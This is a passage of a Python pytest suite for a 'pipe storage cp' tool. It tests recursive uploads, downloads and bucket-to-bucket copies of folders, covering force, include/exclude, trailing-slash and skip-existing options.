TestFiles.TEST_FILE_WITH_OTHER_EXTENSION test_file_2 = "cp-folders-" + TestFiles.TEST_FILE2 test_folder = "cp-folders-" + TestFiles.TEST_FOLDER test_folder_2 = "cp-folders-" + TestFiles.TEST_FOLDER2 test_folder_structure = "cp-folders-structure" test_folder_structure_output = "cp-folders-structure-output" @classmethod def setup_class(cls): logging.basicConfig(filename='tests.log', level=logging.INFO, format='%(levelname)s %(asctime)s %(module)s:%(message)s') create_buckets(cls.bucket_name, cls.other_bucket_name) # /test_folder create_test_folder(os.path.abspath(cls.test_folder)) # /cp-files-test_folder_for_outputs create_test_folder(os.path.abspath(cls.output_folder)) # ./test_file.txt create_test_file(os.path.abspath(cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ./test_folder/test_file.txt create_test_file(os.path.abspath(cls.test_folder + cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ./test_folder/test_file.json create_test_file(os.path.abspath(cls.test_folder + cls.test_file_with_other_extension), TestFiles.DEFAULT_CONTENT) # ./test_folder/other/test_file.txt create_test_file(os.path.abspath(cls.test_folder + cls.test_folder + cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ./test_file2.txt create_test_file(os.path.abspath(cls.test_file_2), TestFiles.COPY_CONTENT) # ~/test_cp_home_dir/test_file.txt create_test_file(os.path.join(os.path.expanduser('~'), cls.home_dir, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ~/test_cp_home_dir/other/test_file.txt create_test_file(os.path.join(os.path.expanduser('~'), cls.home_dir, cls.test_folder, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # /test_folder_structure create_test_folder(os.path.abspath(cls.test_folder_structure)) # /test_folder_structure/test_folder/ create_test_folder(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder)) # /test_folder_structure/other/ create_test_folder(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder_2)) # /test_folder_structure/test_folder/test_file.txt create_test_file(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # /test_folder_structure/other/test_file.txt create_test_file(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder_2, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # /test_folder_structure_output create_test_folder(os.path.abspath(cls.test_folder_structure_output)) @classmethod def teardown_class(cls): delete_buckets(cls.bucket_name, cls.other_bucket_name) clean_test_data(os.path.abspath(cls.test_file_1)) clean_test_data(os.path.abspath(cls.test_file_2)) clean_test_data(os.path.abspath(cls.test_folder)) clean_test_data(os.path.abspath(cls.output_folder)) clean_test_data(os.path.join(os.path.expanduser('~'), cls.home_dir)) clean_test_data(os.path.abspath(cls.checkout_dir)) clean_test_data(os.path.abspath(cls.test_folder_structure)) clean_test_data(os.path.abspath(cls.test_folder_structure_output)) """ 1. epam test case 2. source path 3. with --force option 4. flag if need to switch current directory """ test_case_for_upload_folders = [ ("EPMCMBIBPC-596", os.path.abspath(test_folder), False, None), ("EPMCMBIBPC-597", "~/" + home_dir, None, None), ("EPMCMBIBPC-598", "./" + test_folder, False, None), ("EPMCMBIBPC-598-1", "./", False, True), ("EPMCMBIBPC-598-2", ".", False, True), ("EPMCMBIBPC-599", os.path.abspath(test_folder) + "/", True, None), ] @pytest.mark.run(order=1) @pytest.mark.parametrize("case,source,force,switch_dir", test_case_for_upload_folders) def test_folder_should_be_uploaded(self, case, source, force, switch_dir): destination = "cp://{}/{}/".format(self.bucket_name, case) if force: create_test_files_on_bucket(os.path.abspath(self.test_file_2), self.bucket_name, os.path.join(case, self.test_file_1), os.path.join(case, self.test_folder, self.test_file_1)) if source.startswith("~"): source_to_check = os.path.join(os.path.expanduser('~'), source.strip("~/")) else: source_to_check = source if switch_dir: dir_path = os.path.abspath(os.path.join(self.checkout_dir)) create_test_files(TestFiles.DEFAULT_CONTENT, os.path.join(dir_path, self.test_file_1), os.path.join(dir_path, self.test_folder, self.test_file_1)) os.chdir(dir_path) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, force=force, recursive=True) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source_to_check, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source_to_check, self.test_folder, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_folder + self.test_file_1)), case) os.chdir(self.current_directory) """ 1. epam test case 2. source path 3. path to directory if need to switch current directory 4. relative path to file to rewrite (with --force option) """ test_case_for_download_folders = [ ("EPMCMBIBPC-596", os.path.abspath(output_folder + "EPMCMBIBPC-596") + "/", None, None), ("EPMCMBIBPC-597", "~/" + home_dir + output_folder, None, None), ("EPMCMBIBPC-598", "./" + output_folder + "EPMCMBIBPC-598/", None, None), ("EPMCMBIBPC-598-1", "./", None, True), ("EPMCMBIBPC-598-2", ".", None, True), ("EPMCMBIBPC-599", os.path.abspath(output_folder + "EPMCMBIBPC-599") + "/", True, None), ] @pytest.mark.run(order=2) @pytest.mark.parametrize("case,destination,force,switch_dir", test_case_for_download_folders) def test_folder_should_be_downloaded(self, case, destination, force, switch_dir): source = "cp://{}/{}/".format(self.bucket_name, case) if force: create_test_file(destination + self.test_file_1, TestFiles.COPY_CONTENT) assert os.path.exists(destination + self.test_file_1), \ "Test file {} does not exist".format(destination + self.test_file_1) create_test_file(destination + self.test_folder + self.test_file_1, TestFiles.COPY_CONTENT) assert os.path.exists(destination + self.test_folder + self.test_file_1), \ "Test file {} does not exist".format(destination + self.test_folder + self.test_file_1) if destination.startswith("~"): destination_to_check = os.path.join(os.path.expanduser('~'), destination.strip("~/")) else: destination_to_check = destination if switch_dir: dir_path = os.path.abspath(os.path.join(destination, self.checkout_dir, case)) create_test_folder(dir_path) os.chdir(dir_path) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, force=force, recursive=True) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, "{}/{}".format(case, self.test_file_1)), ObjectInfo(True).build(os.path.join(destination_to_check, self.test_file_1)), case) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, "{}/{}".format( case, self.test_folder + self.test_file_1)), ObjectInfo(True).build(os.path.join(destination_to_check, self.test_folder, self.test_file_1)), case) os.chdir(self.current_directory) """ 1. epam test case 2. --force option """ test_case_for_copy_between_buckets_folders = [ ("EPMCMBIBPC-596", False), ("EPMCMBIBPC-599", True), ] @pytest.mark.run(order=3) @pytest.mark.parametrize("case,force", test_case_for_copy_between_buckets_folders) def test_folder_should_be_copied(self, case, force): source = "cp://{}/{}/".format(self.bucket_name, case) destination = "cp://{}/{}/".format(self.other_bucket_name, case) if force: create_test_files_on_bucket(os.path.abspath(self.test_file_2), self.other_bucket_name, os.path.join(case, self.test_file_1), os.path.join(case, self.test_folder, self.test_file_1)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, force=force, recursive=True) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), ObjectInfo(False).build(self.other_bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_folder, self.test_file_1)), ObjectInfo(False).build(self.other_bucket_name, os.path.join( case, self.test_folder, self.test_file_1)), case) @pytest.mark.run(order=1) def test_excluded_files_should_be_uploaded(self): source = os.path.abspath(self.test_folder) case = "EPMCMBIBPC-604-1" destination = "cp://{}/{}/".format(self.bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, exclude=["*json", "{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_file_with_other_extension)), case) @pytest.mark.run(order=2) def test_excluded_files_should_be_downloaded(self): case = "EPMCMBIBPC-604-2" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = os.path.abspath(os.path.join(self.output_folder, case)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, exclude=["*json", "{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join( destination, self.test_file_with_other_extension)), case) @pytest.mark.run(order=3) def test_excluded_files_should_be_copied(self): case = "EPMCMBIBPC-604-3" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = "cp://{}/{}/".format(self.other_bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, exclude=["*json", "{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(False).build(self.other_bucket_name, key_file_1), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_folder), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_2), case) @pytest.mark.run(order=1) def test_included_files_should_be_uploaded(self): source = os.path.abspath(self.test_folder) case = "EPMCMBIBPC-630-1" destination = "cp://{}/{}/".format(self.bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*json"], expected_status=0) assert_copied_object_info( ObjectInfo(True).build(os.path.join(source, self.test_file_with_other_extension)), ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)), case) assert_copied_object_does_not_exist( ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build( self.bucket_name, os.path.join(case, self.test_file_1)), case) @pytest.mark.run(order=2) def test_included_files_should_be_downloaded(self): case = "EPMCMBIBPC-630-2" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = os.path.abspath(os.path.join(self.output_folder, case)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*json"], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_2), ObjectInfo(True).build(os.path.join(destination, self.test_file_with_other_extension)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, case, self.test_file_1)), case) @pytest.mark.run(order=3) def test_included_files_be_copied(self): case = "EPMCMBIBPC-630-3" source = "cp://{}/{}/".format(self.bucket_name, case) destination = "cp://{}/{}/".format(self.other_bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*json"], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_2), ObjectInfo(False).build(self.other_bucket_name, key_file_2), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_folder), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_1), case) @pytest.mark.run(order=1) def test_included_excluded_files_should_be_uploaded(self): source = os.path.abspath(self.test_folder) case = "EPMCMBIBPC-631-1" destination = "cp://{}/{}/".format(self.bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*txt"], exclude=["{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info( ObjectInfo(True).build(os.path.join(source, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_does_not_exist( ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_with_other_extension)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build( self.bucket_name, os.path.join(case, self.test_file_with_other_extension)), case) @pytest.mark.run(order=2) def test_included_excluded_files_should_be_downloaded(self): case = "EPMCMBIBPC-631-2" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = os.path.abspath(os.path.join(self.output_folder, case)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*txt"], exclude=["{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join( destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join( destination, self.test_file_with_other_extension)), case) @pytest.mark.run(order=3) def test_included_excluded_files_be_copied(self): case = "EPMCMBIBPC-631-3" source = "cp://{}/{}/".format(self.bucket_name, case) destination = "cp://{}/{}/".format(self.other_bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*txt"], exclude=["{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(False).build(self.other_bucket_name, key_file_1), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_folder), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_2), case) @pytest.mark.run(order=4) def test_upload_without_recursive(self): case = "EPMCMBIBPC-662" source = os.path.abspath(self.test_folder) destination = "cp://{}/".format(os.path.join(self.bucket_name, case)) error_text = pipe_storage_cp(source, destination, expected_status=1)[1] assert_error_message_is_present(error_text, "Flag --recursive (-r) is required to copy folders.") assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)), case) @pytest.mark.run(order=5) def test_download_without_recursive(self): case = "EPMCMBIBPC-662" source = "cp://{}/".format(os.path.join(self.bucket_name, case)) create_test_files_on_bucket(self.test_file_1, self.bucket_name, os.path.join(case, self.test_file_1), os.path.join(case, self.test_folder, self.test_file_1)) destination = os.path.abspath(self.output_folder + case) + "/" error_text = pipe_storage_cp(source, destination, expected_status=1)[1] assert_error_message_is_present(error_text, "Flag --recursive (-r) is required to copy folders.") assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) @pytest.mark.run(order=6) def test_copy_without_recursive(self): case = "EPMCMBIBPC-662" source = "cp://{}/".format(os.path.join(self.bucket_name, case)) destination = "cp://{}/".format(os.path.join(self.other_bucket_name, case)) error_text = pipe_storage_cp(source, destination, expected_status=1)[1] assert_error_message_is_present(error_text, "Flag --recursive (-r) is required to copy folders.") assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) @pytest.mark.run(order=6) def test_copy_to_bucket_root(self): case = "EPMCMBIBPC-1969" source = os.path.abspath(self.test_folder) destination = "cp://%s/" % self.bucket_name logging.info("Test case: %s. Ready to perform operation from %s to %s" % (case, source, destination)) pipe_storage_cp(source, destination, recursive=True, force=True) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, self.test_file_1), case) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source, self.test_folder, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, self.test_folder + self.test_file_1), case) @pytest.mark.run(order=6) def test_copy_file_to_bucket_with_folder_with_same_name(self): case = "EPMCMBIBPC-1970" try: pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s/%s/" % (self.bucket_name, case, self.test_file_1)) assert object_exists(self.bucket_name, "%s/%s/%s" % (case, self.test_file_1, self.test_file_1)) pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s/" % (self.bucket_name, case)) assert object_exists(self.bucket_name, "%s/%s" % (case, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_copy_folder_structure(self): case = "EPMCMBIBPC-1971-1972" source = os.path.abspath(self.test_folder_structure) destination = "cp://%s/%s/" % (self.bucket_name, case) logging.info("Test case: %s. Ready to perform operation from %s to %s" % (case, source, destination)) try: pipe_storage_cp(source, destination, recursive=True) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder_2, self.test_file_1)) source = destination destination = os.path.abspath(self.test_folder_structure_output) + "/" logging.info("Test case: %s. Ready to perform operation from %s to %s" % (case, source, destination)) pipe_storage_cp(source, destination, recursive=True, expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)), ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder_2, self.test_file_1)), ObjectInfo(True).build(os.path.join(destination, self.test_folder_2, self.test_file_1)), case) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_upload_file_to_not_empty_folder(self): test_case = "EPMCMBIBPC-1978" try: source1 = "cp://{}/{}/{}".format(self.bucket_name, test_case, self.test_file_1) pipe_storage_cp(os.path.abspath(self.test_file_1), source1, expected_status=0) assert object_exists(self.bucket_name, "%s/%s" % (test_case, self.test_file_1)) source2 = "cp://{}/{}/".format(self.bucket_name, test_case) pipe_storage_cp(os.path.abspath(self.test_file_2), source2, expected_status=0) assert object_exists(self.bucket_name, "%s/%s" % (test_case, self.test_file_2)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(test_case, e.message)) @pytest.mark.run(order=6) def test_upload_folders_with_similar_keys(self): case = "EPMCMBIBPC-2007" source_folder = os.path.abspath(os.path.join(self.test_folder, case)) test_folder1 = "folder" test_folder2 = "folder2" try: create_test_folder(source_folder) create_test_folder(os.path.join(source_folder, test_folder1)) create_test_folder(os.path.join(source_folder, test_folder2)) create_test_file(os.path.join(source_folder, test_folder1, self.test_file_1), TestFiles.DEFAULT_CONTENT) create_test_file(os.path.join(source_folder, test_folder2, self.test_file_2), TestFiles.COPY_CONTENT) pipe_storage_cp(os.path.join(source_folder, test_folder1), "cp://%s/%s/" % (self.bucket_name, case), recursive=True) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert not object_exists(self.bucket_name, os.path.join(case, self.test_file_2)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_download_folders_with_similar_keys(self): case = "EPMCMBIBPC-2008" try: pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s/folder/" % (self.bucket_name, case)) assert object_exists(self.bucket_name, os.path.join(case, "folder", self.test_file_1)) pipe_storage_cp(os.path.abspath(self.test_file_2), "cp://%s/%s/folder2/" % (self.bucket_name, case)) assert object_exists(self.bucket_name, os.path.join(case, "folder2", self.test_file_2)) pipe_storage_cp("cp://%s/%s/folder" % (self.bucket_name, case), "%s/" % os.path.join(self.output_folder, case), recursive=True) assert os.path.exists(os.path.abspath(os.path.join(self.output_folder, case, self.test_file_1))) assert not os.path.exists(os.path.abspath( os.path.join(self.output_folder, case, self.test_file_2))) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) test_case_for_upload_with_slash = [("EPMCMBIBPC-2159-1", True, True), ("EPMCMBIBPC-2159-2", True, False), ("EPMCMBIBPC-2159-3", False, False), ("EPMCMBIBPC-2159-4", False, True)] @pytest.mark.run(order=6) @pytest.mark.parametrize("case,has_destination_slash,has_source_slash", test_case_for_upload_with_slash) def test_folder_with_slash_should_upload_content_only(self, case, has_destination_slash, has_source_slash): source = os.path.abspath(self.test_folder) destination = "cp://%s/%s" % (self.bucket_name, case) source, destination = prepare_paths_with_slash(source, destination, has_source_slash, has_destination_slash) try: pipe_storage_cp(source, destination, recursive=True) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) test_case_for_download_with_slash = [("EPMCMBIBPC-2200-1", True, True), ("EPMCMBIBPC-2200-2", True, False), ("EPMCMBIBPC-2200-3", False, False), ("EPMCMBIBPC-2200-4", False, True)] @pytest.mark.run(order=6) @pytest.mark.parametrize("case,has_destination_slash,has_source_slash", test_case_for_download_with_slash) def test_folder_with_slash_should_download_content_only(self, case, has_destination_slash, has_source_slash): source = "cp://%s/%s" % (self.bucket_name, case) destination = os.path.abspath(os.path.join(self.output_folder, case)) source, destination = prepare_paths_with_slash(source, destination, has_source_slash, has_destination_slash) try: self._create_folder_on_bucket(case) pipe_storage_cp(source, destination, recursive=True) assert os.path.exists(os.path.join(destination, self.test_file_1)) assert os.path.exists(os.path.join(destination, self.test_file_with_other_extension)) assert os.path.exists(os.path.join(destination, self.test_folder, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) test_case_for_copy_between_buckets_with_slash = [("EPMCMBIBPC-2201-1", True, True), ("EPMCMBIBPC-2201-2", True, False), ("EPMCMBIBPC-2201-3", False, False), ("EPMCMBIBPC-2201-4", False, True)] @pytest.mark.run(order=6) @pytest.mark.parametrize("case,has_destination_slash,has_source_slash", test_case_for_copy_between_buckets_with_slash) def test_folder_with_slash_should_copy_between_buckets_content_only(self, case, has_destination_slash, has_source_slash): source = "cp://%s/%s" % (self.bucket_name, case) destination = "cp://%s/%s" % (self.other_bucket_name, case) source, destination = prepare_paths_with_slash(source, destination, has_source_slash, has_destination_slash) try: self._create_folder_on_bucket(case) pipe_storage_cp(source, destination, recursive=True) assert object_exists(self.other_bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.other_bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.other_bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_upload_folder_with_skip_existing_option_should_skip(self): case = "EPMCMBIBPC-2162" key = os.path.join(case, self.test_file_1) source = os.path.abspath(self.test_folder) destination = "cp://%s/%s" % (self.bucket_name, case) try: expected = create_file_on_bucket(self.bucket_name, key, os.path.abspath(os.path.join(self.test_folder, self.test_file_1))) pipe_storage_cp(source, destination, force=True, recursive=True, skip_existing=True) assert object_exists(self.bucket_name, key) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) actual = ObjectInfo(False).build(self.bucket_name, key) assert expected.size == actual.size, \ "Sizes must be the same.\nExpected %s\nActual %s" % (expected.size, actual.size) assert expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be the same.\n" \ "Expected %s\nActual %s".format(expected.last_modified, actual.last_modified) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_upload_folder_with_skip_existing_option_should_not_skip(self): case = "EPMCMBIBPC-2163" key1 = os.path.join(case, self.test_file_1) source = os.path.abspath(self.test_folder) destination = "cp://%s/%s" % (self.bucket_name, case) try: expected = create_file_on_bucket(self.bucket_name, key1, os.path.abspath(self.test_file_2)) pipe_storage_cp(source, destination, force=True, recursive=True, skip_existing=True) assert object_exists(self.bucket_name, key1) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) actual = ObjectInfo(False).build(self.bucket_name, key1) assert not expected.size == actual.size, "Sizes must be the different." assert not expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be different." except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_download_folder_with_skip_existing_option_should_skip(self): case = "EPMCMBIBPC-2182" destination_folder = os.path.abspath(os.path.join(self.output_folder, case)) destination1 = os.path.join(destination_folder, self.test_file_1) destination2 = os.path.join(destination_folder, self.test_file_2) source_folder = "cp://%s/%s/" % (self.bucket_name, case) try: create_test_file(destination1, TestFiles.DEFAULT_CONTENT) expected = ObjectInfo(True).build(destination1) pipe_storage_cp(os.path.abspath(self.test_file_1), source_folder) pipe_storage_cp(os.path.abspath(self.test_file_2), source_folder) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_2)) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert os.path.exists(destination1) assert os.path.exists(destination2) actual = ObjectInfo(True).build(destination1) assert expected.size == actual.size, \ "Sizes must be the same.\nExpected %s\nActual %s" % (expected.size, actual.size) assert expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be the same.\n" \ "Expected %s\nActual %s".format(expected.last_modified, actual.last_modified) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_download_folder_with_skip_existing_option_should_not_skip(self): case = "EPMCMBIBPC-2184" destination_folder = os.path.abspath(os.path.join(self.output_folder, case)) destination1 = os.path.join(destination_folder, self.test_file_1) destination2 = os.path.join(destination_folder, self.test_file_2) source_folder = "cp://%s/%s/" % (self.bucket_name, case) try: create_test_file(destination1, TestFiles.COPY_CONTENT) expected = ObjectInfo(True).build(destination1) pipe_storage_cp(os.path.abspath(self.test_file_1), source_folder) pipe_storage_cp(os.path.abspath(self.test_file_2), source_folder) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_2)) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert os.path.exists(destination1) assert os.path.exists(destination2) actual = ObjectInfo(True).build(destination1) assert not expected.size == actual.size, "Sizes must be the different." assert not expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be different." except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_copy_folder_between_buckets_with_skip_existing_option_should_skip(self): case = "EPMCMBIBPC-2207" source_folder = "cp://%s/%s/" % (self.bucket_name, case) destination_folder = "cp://%s/%s/" % (self.other_bucket_name, case) key1 = os.path.join(case, self.test_file_1) key2 = os.path.join(case, self.test_file_2) try: expected = create_file_on_bucket(self.other_bucket_name, key1, os.path.abspath(self.test_file_1)) pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s" % (self.bucket_name, key1)) pipe_storage_cp(os.path.abspath(self.test_file_2), "cp://%s/%s" % (self.bucket_name, key2)) assert object_exists(self.bucket_name, key1) assert object_exists(self.bucket_name, key2) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert object_exists(self.other_bucket_name, key1) assert object_exists(self.other_bucket_name, key2) actual = ObjectInfo(False).build(self.other_bucket_name, key1) assert expected.size == actual.size, \ "Sizes must be the same.\nExpected %s\nActual %s" % (expected.size, actual.size) assert expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be the same.\n" \ "Expected %s\nActual %s".format(expected.last_modified, actual.last_modified) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_copy_folder_between_buckets_with_skip_existing_option_should_not_skip(self): case = "EPMCMBIBPC-2208" key1 = os.path.join(case, self.test_file_1) key2 = os.path.join(case, self.test_file_2) source_folder = "cp://%s/%s/" % (self.bucket_name, case) destination_folder = "cp://%s/%s/" % (self.other_bucket_name, case) try: expected = create_file_on_bucket(self.other_bucket_name, key1, 